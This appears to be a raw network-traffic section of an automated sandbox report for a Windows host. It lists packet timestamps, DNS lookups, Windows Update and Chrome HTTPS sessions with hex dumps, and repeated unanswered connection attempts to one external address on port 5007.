Apr 29, 2024 11:36:37.771462917 CEST	49712	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.771483898 CEST	443	49712	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.771629095 CEST	49713	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.771641016 CEST	443	49713	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.772084951 CEST	49715	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.772103071 CEST	443	49715	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.889787912 CEST	49720	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.889805079 CEST	443	49720	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.889820099 CEST	49713	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.889826059 CEST	49715	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.889826059 CEST	49712	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.889828920 CEST	49714	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.979042053 CEST	443	49714	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.979089975 CEST	443	49714	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.979121923 CEST	443	49714	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.979140043 CEST	49714	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.979159117 CEST	443	49714	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.979197025 CEST	49714	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:37.982501030 CEST	443	49714	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.983678102 CEST	443	49714	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:37.983727932 CEST	49714	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:38.011163950 CEST	49720	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:38.233469009 CEST	443	49715	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:38.233619928 CEST	49715	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:38.233638048 CEST	443	49715	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:38.233650923 CEST	443	49715	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:38.233710051 CEST	49715	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:38.265516043 CEST	443	49712	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:38.265645027 CEST	443	49712	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:38.265655994 CEST	49712	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:38.265711069 CEST	49712	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:38.313076973 CEST	443	49713	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:38.313153028 CEST	49713	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:38.313190937 CEST	443	49713	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:38.313234091 CEST	443	49713	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:38.313275099 CEST	49713	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:38.324850082 CEST	49712	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:38.324892044 CEST	443	49712	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:38.347089052 CEST	49715	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:38.347107887 CEST	443	49715	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:38.347527027 CEST	49713	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:38.347554922 CEST	443	49713	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:38.352211952 CEST	49714	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:38.352227926 CEST	443	49714	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:38.355350018 CEST	49721	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:38.355374098 CEST	443	49721	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:38.355437040 CEST	49721	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:38.356668949 CEST	49720	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:38.357223034 CEST	49721	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:38.357235909 CEST	443	49721	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:38.404122114 CEST	443	49720	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:38.480937958 CEST	443	49720	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:38.481000900 CEST	443	49720	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:38.481044054 CEST	49720	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:38.481074095 CEST	443	49720	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:38.481167078 CEST	443	49720	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:38.481214046 CEST	49720	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:38.482805014 CEST	49720	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:38.482820988 CEST	443	49720	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:38.593843937 CEST	443	49721	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:38.595549107 CEST	49721	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:38.595560074 CEST	443	49721	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:38.595895052 CEST	443	49721	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:38.596347094 CEST	49721	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:38.596407890 CEST	443	49721	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:38.596514940 CEST	49721	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:38.640130043 CEST	443	49721	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:38.828789949 CEST	443	49721	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:38.828835011 CEST	443	49721	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:38.828883886 CEST	443	49721	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:38.828896999 CEST	49721	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:38.828916073 CEST	443	49721	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:38.828973055 CEST	443	49721	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:38.829020977 CEST	49721	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:38.847544909 CEST	49721	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:38.847565889 CEST	443	49721	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:39.412004948 CEST	49724	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:39.412046909 CEST	443	49724	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:39.412127018 CEST	49724	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:39.412395000 CEST	49724	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:39.412410021 CEST	443	49724	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:39.646238089 CEST	443	49724	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:39.646502972 CEST	49724	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:39.646518946 CEST	443	49724	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:39.646837950 CEST	443	49724	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:39.647208929 CEST	49724	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:39.647274971 CEST	443	49724	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:39.687374115 CEST	49724	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:42.595989943 CEST	49727	5007	192.168.2.8	102.165.14.26
Apr 29, 2024 11:36:42.990530014 CEST	49707	443	192.168.2.8	23.206.229.226
Apr 29, 2024 11:36:42.990556002 CEST	443	49707	23.206.229.226	192.168.2.8
Apr 29, 2024 11:36:42.991373062 CEST	49728	443	192.168.2.8	23.206.229.226
Apr 29, 2024 11:36:42.991422892 CEST	443	49728	23.206.229.226	192.168.2.8
Apr 29, 2024 11:36:42.991512060 CEST	49728	443	192.168.2.8	23.206.229.226
Apr 29, 2024 11:36:42.991708994 CEST	49728	443	192.168.2.8	23.206.229.226
Apr 29, 2024 11:36:42.991803885 CEST	443	49728	23.206.229.226	192.168.2.8
Apr 29, 2024 11:36:42.991852999 CEST	49728	443	192.168.2.8	23.206.229.226
Apr 29, 2024 11:36:43.780817032 CEST	49727	5007	192.168.2.8	102.165.14.26
Apr 29, 2024 11:36:44.503359079 CEST	49729	443	192.168.2.8	23.221.246.93
Apr 29, 2024 11:36:44.503407955 CEST	443	49729	23.221.246.93	192.168.2.8
Apr 29, 2024 11:36:44.503536940 CEST	49729	443	192.168.2.8	23.221.246.93
Apr 29, 2024 11:36:44.505013943 CEST	49729	443	192.168.2.8	23.221.246.93
Apr 29, 2024 11:36:44.505031109 CEST	443	49729	23.221.246.93	192.168.2.8
Apr 29, 2024 11:36:44.732948065 CEST	443	49729	23.221.246.93	192.168.2.8
Apr 29, 2024 11:36:44.733105898 CEST	49729	443	192.168.2.8	23.221.246.93
Apr 29, 2024 11:36:45.890508890 CEST	49727	5007	192.168.2.8	102.165.14.26
Apr 29, 2024 11:36:46.148545980 CEST	49729	443	192.168.2.8	23.221.246.93
Apr 29, 2024 11:36:46.148576021 CEST	443	49729	23.221.246.93	192.168.2.8
Apr 29, 2024 11:36:46.149005890 CEST	443	49729	23.221.246.93	192.168.2.8
Apr 29, 2024 11:36:46.296649933 CEST	49729	443	192.168.2.8	23.221.246.93
Apr 29, 2024 11:36:46.312079906 CEST	49729	443	192.168.2.8	23.221.246.93
Apr 29, 2024 11:36:46.352122068 CEST	443	49729	23.221.246.93	192.168.2.8
Apr 29, 2024 11:36:46.422450066 CEST	443	49729	23.221.246.93	192.168.2.8
Apr 29, 2024 11:36:46.422533035 CEST	443	49729	23.221.246.93	192.168.2.8
Apr 29, 2024 11:36:46.422584057 CEST	49729	443	192.168.2.8	23.221.246.93
Apr 29, 2024 11:36:46.519045115 CEST	49729	443	192.168.2.8	23.221.246.93
Apr 29, 2024 11:36:46.519078970 CEST	443	49729	23.221.246.93	192.168.2.8
Apr 29, 2024 11:36:46.519092083 CEST	49729	443	192.168.2.8	23.221.246.93
Apr 29, 2024 11:36:46.519108057 CEST	443	49729	23.221.246.93	192.168.2.8
Apr 29, 2024 11:36:47.012392044 CEST	49730	443	192.168.2.8	23.221.246.93
Apr 29, 2024 11:36:47.012425900 CEST	443	49730	23.221.246.93	192.168.2.8
Apr 29, 2024 11:36:47.012489080 CEST	49730	443	192.168.2.8	23.221.246.93
Apr 29, 2024 11:36:47.013129950 CEST	49730	443	192.168.2.8	23.221.246.93
Apr 29, 2024 11:36:47.013142109 CEST	443	49730	23.221.246.93	192.168.2.8
Apr 29, 2024 11:36:47.237124920 CEST	443	49730	23.221.246.93	192.168.2.8
Apr 29, 2024 11:36:47.237194061 CEST	49730	443	192.168.2.8	23.221.246.93
Apr 29, 2024 11:36:47.240051031 CEST	49730	443	192.168.2.8	23.221.246.93
Apr 29, 2024 11:36:47.240068913 CEST	443	49730	23.221.246.93	192.168.2.8
Apr 29, 2024 11:36:47.240343094 CEST	443	49730	23.221.246.93	192.168.2.8
Apr 29, 2024 11:36:47.242202044 CEST	49730	443	192.168.2.8	23.221.246.93
Apr 29, 2024 11:36:47.284125090 CEST	443	49730	23.221.246.93	192.168.2.8
Apr 29, 2024 11:36:47.456166983 CEST	443	49730	23.221.246.93	192.168.2.8
Apr 29, 2024 11:36:47.456244946 CEST	443	49730	23.221.246.93	192.168.2.8
Apr 29, 2024 11:36:47.456326008 CEST	49730	443	192.168.2.8	23.221.246.93
Apr 29, 2024 11:36:47.458143950 CEST	49730	443	192.168.2.8	23.221.246.93
Apr 29, 2024 11:36:47.458143950 CEST	49730	443	192.168.2.8	23.221.246.93
Apr 29, 2024 11:36:47.458165884 CEST	443	49730	23.221.246.93	192.168.2.8
Apr 29, 2024 11:36:47.458177090 CEST	443	49730	23.221.246.93	192.168.2.8
Apr 29, 2024 11:36:49.683778048 CEST	443	49724	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:49.683845043 CEST	443	49724	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:49.683959961 CEST	49724	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:49.986418009 CEST	49727	5007	192.168.2.8	102.165.14.26
Apr 29, 2024 11:36:50.684766054 CEST	49724	443	192.168.2.8	142.250.191.196
Apr 29, 2024 11:36:50.684806108 CEST	443	49724	142.250.191.196	192.168.2.8
Apr 29, 2024 11:36:57.996526957 CEST	49727	5007	192.168.2.8	102.165.14.26
Apr 29, 2024 11:37:08.150590897 CEST	49731	5007	192.168.2.8	102.165.14.26
Apr 29, 2024 11:37:09.156079054 CEST	49731	5007	192.168.2.8	102.165.14.26
Apr 29, 2024 11:37:11.174304962 CEST	49731	5007	192.168.2.8	102.165.14.26
Apr 29, 2024 11:37:15.177921057 CEST	49731	5007	192.168.2.8	102.165.14.26
Apr 29, 2024 11:37:23.188491106 CEST	49731	5007	192.168.2.8	102.165.14.26

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 29, 2024 11:36:13.254407883 CEST	138	138	192.168.2.8	192.168.2.255
Apr 29, 2024 11:36:35.524260998 CEST	53	52933	1.1.1.1	192.168.2.8
Apr 29, 2024 11:36:36.040930033 CEST	59151	53	192.168.2.8	1.1.1.1
Apr 29, 2024 11:36:36.041805029 CEST	49251	53	192.168.2.8	1.1.1.1
Apr 29, 2024 11:36:36.122085094 CEST	53	56534	1.1.1.1	192.168.2.8
Apr 29, 2024 11:36:36.151113033 CEST	53	59151	1.1.1.1	192.168.2.8
Apr 29, 2024 11:36:36.151906967 CEST	53	49251	1.1.1.1	192.168.2.8
Apr 29, 2024 11:36:38.457123041 CEST	53	62741	1.1.1.1	192.168.2.8
Apr 29, 2024 11:36:56.380898952 CEST	53	58256	1.1.1.1	192.168.2.8
Apr 29, 2024 11:37:15.956664085 CEST	53	64617	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 29, 2024 11:36:36.040930033 CEST	192.168.2.8	1.1.1.1	0xaa6a	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Apr 29, 2024 11:36:36.041805029 CEST	192.168.2.8	1.1.1.1	0x816c	Standard query (0)	www.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 29, 2024 11:36:36.151113033 CEST	1.1.1.1	192.168.2.8	0xaa6a	No error (0)	www.google.com		142.250.191.196	A (IP address)	IN (0x0001)	false
Apr 29, 2024 11:36:36.151906967 CEST	1.1.1.1	192.168.2.8	0x816c	No error (0)	www.google.com			65	IN (0x0001)	false

HTTP Request Dependency Graph

slscr.update.microsoft.com

www.google.com

fs.microsoft.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49705	20.12.23.50	443

Timestamp	Bytes transferred	Direction	Data
2024-04-29 09:35:39 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=VT3pXKsaaw8sTtx&MD=cPzR33Sv HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-04-29 09:35:40 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 254cb838-31d8-42fa-a0e1-7ca2587cfa00 MS-RequestId: 6f905b16-aa35-471d-bd2b-d84cfc59f221 MS-CV: uZ9wB9Qfjkiobpg7.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Mon, 29 Apr 2024 09:35:39 GMT Connection: close Content-Length: 24490
2024-04-29 09:35:40 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-04-29 09:35:40 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49710	20.12.23.50	443

Timestamp	Bytes transferred	Direction	Data
2024-04-29 09:36:22 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=VT3pXKsaaw8sTtx&MD=cPzR33Sv HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-04-29 09:36:22 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160" MS-CorrelationId: 2b2c49eb-c133-4705-95ea-46352cd0c9f7 MS-RequestId: ed689648-3894-43c5-80e3-dbbbc772e076 MS-CV: iQUNn9SUAU+G/aQl.0 X-Microsoft-SLSClientCache: 2160 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Mon, 29 Apr 2024 09:36:22 GMT Connection: close Content-Length: 25457
2024-04-29 09:36:22 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92 Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
2024-04-29 09:36:22 UTC	9633	IN	Data Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49714	142.250.191.196	443	6264	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 09:36:37 UTC	603	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIkqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw== Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-29 09:36:37 UTC	1703	IN	HTTP/1.1 200 OK Date: Mon, 29 Apr 2024 09:36:37 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-Id_C6lHRYbkopkn_PY9S7A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-04-29 09:36:37 UTC	1703	IN	Data Raw: 38 61 63 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6d 61 6e 6f 72 20 6c 6f 72 64 73 20 67 61 6d 65 22 2c 22 77 6f 6d 61 6e 20 64 65 66 72 61 75 64 65 64 20 70 6f 73 74 61 6c 20 73 65 72 76 69 63 65 22 2c 22 73 6f 75 74 68 77 65 73 74 20 61 69 72 6c 69 6e 65 73 20 66 6c 69 67 68 74 73 22 2c 22 6e 66 6c 20 64 72 61 66 74 20 75 6e 64 72 61 66 74 65 64 20 66 72 65 65 20 61 67 65 6e 74 20 73 69 67 6e 69 6e 67 73 22 2c 22 73 74 61 72 64 65 77 20 76 61 6c 6c 65 79 20 31 2e 36 20 63 6f 6e 73 6f 6c 65 20 75 70 64 61 74 65 22 2c 22 73 70 61 63 65 78 20 66 61 6c 63 6f 6e 20 39 20 72 6f 63 6b 65 74 20 6c 61 75 6e 63 68 22 2c 22 62 72 61 6e 63 68 69 6e 67 20 6f 75 74 20 68 61 6c 6c 6d 61 72 6b 20 6d 6f 76 69 65 20 63 61 73 74 22 2c 22 6e 79 74 20 73 74 72 61 6e 64 73 20 Data Ascii: 8ac)]}'["",["manor lords game","woman defrauded postal service","southwest airlines flights","nfl draft undrafted free agent signings","stardew valley 1.6 console update","spacex falcon 9 rocket launch","branching out hallmark movie cast","nyt strands
2024-04-29 09:36:37 UTC	524	IN	Data Raw: 6f 35 64 46 70 5a 62 46 45 30 56 47 52 48 4e 6c 52 4c 4d 6b 31 71 53 56 42 5a 4f 58 56 6c 5a 6a 51 77 57 55 6f 31 53 58 6c 71 61 6b 38 35 52 7a 52 72 52 55 38 77 52 57 34 79 53 6a 64 75 4e 44 41 76 5a 6a 68 42 4d 47 5a 71 61 55 64 30 62 55 46 32 4d 32 74 36 4e 54 63 32 4f 45 5a 4b 61 6a 49 78 62 54 6c 43 4e 6d 78 79 59 55 4a 30 4d 47 70 7a 64 32 73 79 65 44 68 75 63 30 4a 75 53 47 49 33 62 6d 70 57 63 33 5a 79 54 6c 46 35 61 57 52 77 62 48 6c 6a 57 6b 4a 4b 52 32 5a 4a 4d 57 5a 51 62 58 6b 78 4e 30 39 6c 63 33 49 35 52 47 34 72 52 33 67 31 52 32 64 79 4f 56 68 77 57 6d 4a 49 56 7a 4e 44 56 58 4a 30 63 44 52 70 4e 6d 68 31 65 6b 34 79 56 57 5a 4b 64 31 42 75 55 33 52 56 5a 58 4d 30 52 54 4e 69 53 6e 46 6f 61 58 5a 4b 52 7a 68 45 56 6b 51 32 63 6e 5a 56 4f Data Ascii: 